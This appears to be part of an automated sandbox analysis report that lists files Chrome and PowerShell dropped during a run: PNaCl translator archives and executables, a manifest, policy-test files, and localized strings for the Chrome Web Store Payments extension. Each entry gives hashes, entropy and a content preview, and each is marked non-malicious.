Preview:	!<arch>./ 0 0 0 0 942 `....;...\|.......4...x..#...-...4l..E...M...U...]...n...u...~X...4.......................L......................t...p...............`......"...*...1...:...D...K...T...\...d...r\|..\|0.......x...........L.......\...8..........................__clzti2.__compilerrt_fmax.__compilerrt_fmaxf.__compilerrt_logb.__compilerrt_logbf.__ctzti2.__divdc3.__divdi3.__divmoddi4.__divmodsi4.__divsc3.__divsi3.__divti3.__fixdfdi.__fixdfsi.__fixdfti.__fixsfdi.__fixsfsi.__fixsfti.__fixunsdfdi.__fixunsdfsi.__fixunsdfti.__fixunssfdi.__fixunssfsi.__fixunssfti.__floatdidf.__floatdisf.__floatsidf.__floatsisf.__floattidf.__floattisf.__floatundidf.__floatundisf.__floatunsidf.__floatunsisf.__floatuntidf.__floatuntisf.compilerrt_abort_impl.__moddi3.__modsi3.__modti3.__muldc3.__muloti4.__mulsc3.__multi3.__popcountdi2.__popcountsi2.__popcountti2.__powidf2.__powisf2.__udivdi3.__udivmoddi4.__udivmodsi4.__udivmodti4.__udivsi3.__udivti3.__umoddi3.__umodsi3.

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	current ar archive
Category:	dropped
Size (bytes):	13514
Entropy (8bit):	3.8217211433441904
Encrypted:	false
SSDEEP:	192:uU9v4pXizdrEuxwk3vp20tprpdSGFwDqO:P9v4palvvc0tpFdSGFwmO
MD5:	4E8BEDA73EB7BD99528BF62B7835A3FA
SHA1:	DC0F263A7B2A649D11FF7B56FE9CFAC44F946036
SHA-256:	6B835FD48DF505EB336FF6518CE7B93BB0ED854DADAA5C1EEED48D420291F62C
SHA-512:	46116B8BABC719676D68FD40D2AC82F38A3D13D8A482ADFC6FC32A99170AC3420E52CC33242CCD0FA723ABF4FA5EDBB9CE16A09C729BF04AE4AFBB2F67A1E38B
Malicious:	false
Preview:	!<arch>./ 0 0 0 0 94 `................._pnacl_wrapper_start.__pnacl_real_irt_query_func.__pnacl_wrap_irt_query_func..shim_entry.o/ 0 0 0 644 7392 `..ELF..............>..................... ...........@.....@.........................NaCl....x86-64..................................A.L....A.L...D...........D....A.....t+.. u..t"..A.D..........A... .....A.D...........f..D..<.......................Q.......................V.......................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f).../../ppapi/native_client/src/untrusted/pnacl_irt_shim/shim_entry.c./mnt/data/b/build/slave/sdk/build/src/out_pnacl/x64.NACL_STARTUP_FINI.NACL_STARTUP_ENVC.NACL_STARTUP_ARGC.NACL_STARTUP_ARGV.NaClStartupInfoIndex.unsigned int.size_t.char.TYPE_na

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	current ar archive
Category:	dropped
Size (bytes):	2078
Entropy (8bit):	3.21751839673526
Encrypted:	false
SSDEEP:	24:MOcpdhWE5O/bZbmT3296bmT3TwQwDnvD/+R3:MHuECdaTS6aTTwXDvD/+l
MD5:	F950F89D06C45E63CE9862BE59E937C9
SHA1:	9CFAD34139CC428CE0C07A869C15B71A9632365D
SHA-256:	945B1C8A1666CBF05E8B8941B70D9D044BAAFB59B006F728F8995072DE7C4C40
SHA-512:	F9AFBB800A875EDCC63DEA4986179E73632B3182951A99C8B3D37DB454EFD7CC7192ECA5AC87514918A858BAD6DAEAB59548CA2E90EADA9900EF5B9F08E62CFC
Malicious:	false
Preview:	!<arch>./ 0 0 0 0 30 `........._pnacl_wrapper_start..// 20 `.dummy_shim_entry.o/./0 0 0 0 644 1840 `..ELF..............>.................................@.....@.......................................PH..,$J.l=....J.$<.....f..D......................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x...................... ....C....C..... .........................rela.text..comment..bss..group..note.GNU-stack..rela.eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.....................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce, stripped
Category:	dropped
Size (bytes):	14091416
Entropy (8bit):	5.928868737447095
Encrypted:	false
SSDEEP:	196608:tKVqXp3Qev4dg6ilfHM8KLM2J3jqjnkZ:uqufB
MD5:	9B159191C29E766EBBF799FA951C581B
SHA1:	D1D4BBC63AB5FC1E4A54EB7B82095A6F2CE535EE
SHA-256:	2F4A3A0730142C5EE4FA2C05D27A5DEFC18886A382D45F5DB254B61B28ED642B
SHA-512:	0B4FF60B5428F81B8B1BCF3328CF80CBD88D8CE5E8BDBC236B06D5A54E7CF26168A3ABB348D87423DA613AB3F0B4D9B37CB5180804839F1CA158EC2B315DDF00
Malicious:	false
Preview:	.ELF..............>..... .......@...................@.8...@...............$.....................................................................................................................!.......!......'......G...............................................@.......@...............P.td............................D.......D...............Q.td................................................................NaCl....x86-64..............GNU.0.m=F>k....&...i........................0C......0C..0C..0E..............0C......0E.-DT.!.?.-DT.!.........................?........-DT.!...-DT.!.?.......?......................?..............?."..."..."..."......@.......`...................... ...@...`...................... ...@...`...................... ...@...`...................... ...@...`.......................................`... ...@...`...........`...`.......@...@....... ....1..`3.. 4..`-..`-...:...:...F..@H..`H...H...F...F...G...H.. H...F..@G...I.. I..@I..@G...G...I...I...J...G..`I..

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9, stripped
Category:	dropped
Size (bytes):	1901720
Entropy (8bit):	5.955741933854651
Encrypted:	false
SSDEEP:	12288:gXqUSpBjwQO2o8k+7zjidg4euCAauOILffvCpGy4Wh3BTFmHpq82K2/KsvPyla9d:gafZwcOdNe2auOepCBTFmJq3Kf8ksr
MD5:	9DC3172630E525854B232FF71499D77C
SHA1:	0082C58EDCE3769E90DB48E7C26090CE706AD434
SHA-256:	6AA1DA6C264E0AF4E32A004F4076C7557C6AC6D9C38B0C5DE97302D83FA248C3
SHA-512:	9E9584241A39EED1463D7D4C1B26AE570B839AA315778FF3400C61341EBA43B630307DE9F1532A265CA82EA69BDEA03EC9D963E59A18569C02DA8285449870FE
Malicious:	false
Preview:	.ELF..............>..... .......@...................@.8...@.............................................................................................0.......0................................................Y......................................................@.......@...............P.td....t^......t^......t^.......W.......W..............Q.td................................................................NaCl....x86-64..............GNU.K..J.'..b......<S...`...`... ...@...@.......@.............................................Y@......................p................@.......?..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@`...`.......@.................................................. ...`... ... .......`................... ... ...@...`.......................@... Z...[...[...e.......... ...@... ...@...`........0...0...2..`4.. 6...7...9...~...~...z...{...{..

C:\Users\user\AppData\Local\Temp\7040_2142074851\manifest.fingerprint Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.928261499316817
Encrypted:	false
SSDEEP:	3:STDLGswXEVBcVdBiTDt3zLsW:SPLGLErcVdBiDtf3
MD5:	C00BCE97F21B1AD61EB9B8CD001795EE
SHA1:	8E0392FF3DB267D847711C3F4E0D7468060E1535
SHA-256:	59F06F04230E32E8BC839F45B984D31D611930427B631C963D09E7064A602363
SHA-512:	9930E44A6ECC62505DBADCEED5E05645909FF09816FB12AAC0414E6D2830AC09758366C3B7D4EDD7839C87EB16DFA4C66D8981AE6237D408B37135C3506F4CD2
Malicious:	false
Preview:	1.6f6bc93dcd62dc251850d2ff458fda96083ceb7fbe8eeb11248b8485ef2aea23

C:\Users\user\AppData\Local\Temp\7040_2142074851\manifest.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	573
Entropy (8bit):	4.859567579783832
Encrypted:	false
SSDEEP:	12:BLqG6yDJmL4mLDlG9hQ181G46XzrXc+EFfNqpaiOc+T5NqXIOclNqXL:BkylmL4mLDlJ18116XsRNqtZeNqXIZlE
MD5:	1863B86D0863199AFDA179482032945F
SHA1:	36F56692E12F2A1EFCA7736C236A8D776B627A86
SHA-256:	F14E451CE2314D29087B8AD0309A1C8B8E81D847175EF46271E0EB49B4F84DC5
SHA-512:	836556F3D978A89D3FC1F07FCED2732A17E314ED6A021737F087E32A69BFA46FD706EBBDFD3607FF42EDCB75DC463C29B9D9D2F122504F567BB95844F579831B
Malicious:	false
Preview:	{."update_url": "https://clients2.google.com/service/update2/crx",.. "description": "Portable Native Client Translator Multi-CRX",. "name": "PNaCl Translator Multi-CRX",. "manifest_version": 2,. "minimum_chrome_version": "30.0.0.0",. "version": "0.57.44.2492",. "platforms": [. {. "nacl_arch": "x86-32",. "sub_package_path": "_platform_specific/x86_32/". },. {. "nacl_arch": "x86-64",. "sub_package_path": "_platform_specific/x86_64/". },. {. "nacl_arch": "arm",. "sub_package_path": "_platform_specific/arm/". }. ].}.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g42smy0y.3za.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mstg0eih.qml.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\390e5361-2779-4cb3-acd8-4110dc8c167d.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	248531
Entropy (8bit):	7.963657412635355
Encrypted:	false
SSDEEP:	3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
MD5:	541F52E24FE1EF9F8E12377A6CCAE0C0
SHA1:	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
SHA-256:	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
SHA-512:	D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
Malicious:	false
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f\|.~.c.4.E.......0..0....H............0.......).'..b.$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.\|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$\|..\|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...\|!..A..L.+.=...kP.!.1..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\bg\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	796
Entropy (8bit):	4.864931792423268
Encrypted:	false
SSDEEP:	12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
MD5:	6F8E288A9AD5B1ED8633B430E2B4D4CA
SHA1:	F671D3D4BEFA431D1946D706F4192D44E29B6F08
SHA-256:	A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
SHA-512:	0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
Malicious:	false
Preview:	{.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ca\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	675
Entropy (8bit):	4.536753193530313
Encrypted:	false
SSDEEP:	12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
MD5:	1FDAFC926391BD580B655FBAF46ED260
SHA1:	C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
SHA-256:	C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
SHA-512:	39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\cs\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	641
Entropy (8bit):	4.698608127109193
Encrypted:	false
SSDEEP:	12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
MD5:	76DEC64ED1556180B452A13C83171883
SHA1:	CFB1E56FD587BCDC459C1D9A683B71F9849058F9
SHA-256:	32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
SHA-512:	5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\da\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	624
Entropy (8bit):	4.5289746475384565
Encrypted:	false
SSDEEP:	12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
MD5:	238B97A36E411E42FF37CEFAF2927ED1
SHA1:	4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
SHA-256:	4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
SHA-512:	FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\de\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	651
Entropy (8bit):	4.583694000020627
Encrypted:	false
SSDEEP:	12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
MD5:	6B3E916E8C1991AA0453CBA00FEDCAAA
SHA1:	D6366D15912E40CA107FD42BFE9579C3336A51F9
SHA-256:	A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
SHA-512:	87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\el\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.973349962793468
Encrypted:	false
SSDEEP:	24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
MD5:	05C437A322C1148B5F78B2F341339147
SHA1:	AB53003A678E44A170E73711FBD9949833BBF3AA
SHA-256:	A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
SHA-512:	C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
Malicious:	false
Preview:	{.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\en\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.483686991119526
Encrypted:	false
SSDEEP:	12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
MD5:	91F5BC87FD478A007EC68C4E8ADF11AC
SHA1:	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
SHA-256:	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
SHA-512:	FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\en_GB\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.483686991119526
Encrypted:	false
SSDEEP:	12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
MD5:	91F5BC87FD478A007EC68C4E8ADF11AC
SHA1:	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
SHA-256:	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
SHA-512:	FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\es\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	661
Entropy (8bit):	4.450938335136508
Encrypted:	false
SSDEEP:	12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
MD5:	82719BD3999AD66193A9B0BB525F97CD
SHA1:	41194D511F1ACC16C1CA828AC81C18C8C6B47287
SHA-256:	4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
SHA-512:	D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\es_419\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	637
Entropy (8bit):	4.47253983486615
Encrypted:	false
SSDEEP:	12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
MD5:	6B2583D8D1C147E36A69A88009CBEBC7
SHA1:	4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
SHA-256:	6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
SHA-512:	37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\et\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	595
Entropy (8bit):	4.467205425399467
Encrypted:	false
SSDEEP:	12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
MD5:	CFF6CB76EC724B17C1BC920726CB35A7
SHA1:	14ED068251D65A840F00C05409D705259D329FFC
SHA-256:	C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
SHA-512:	53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..

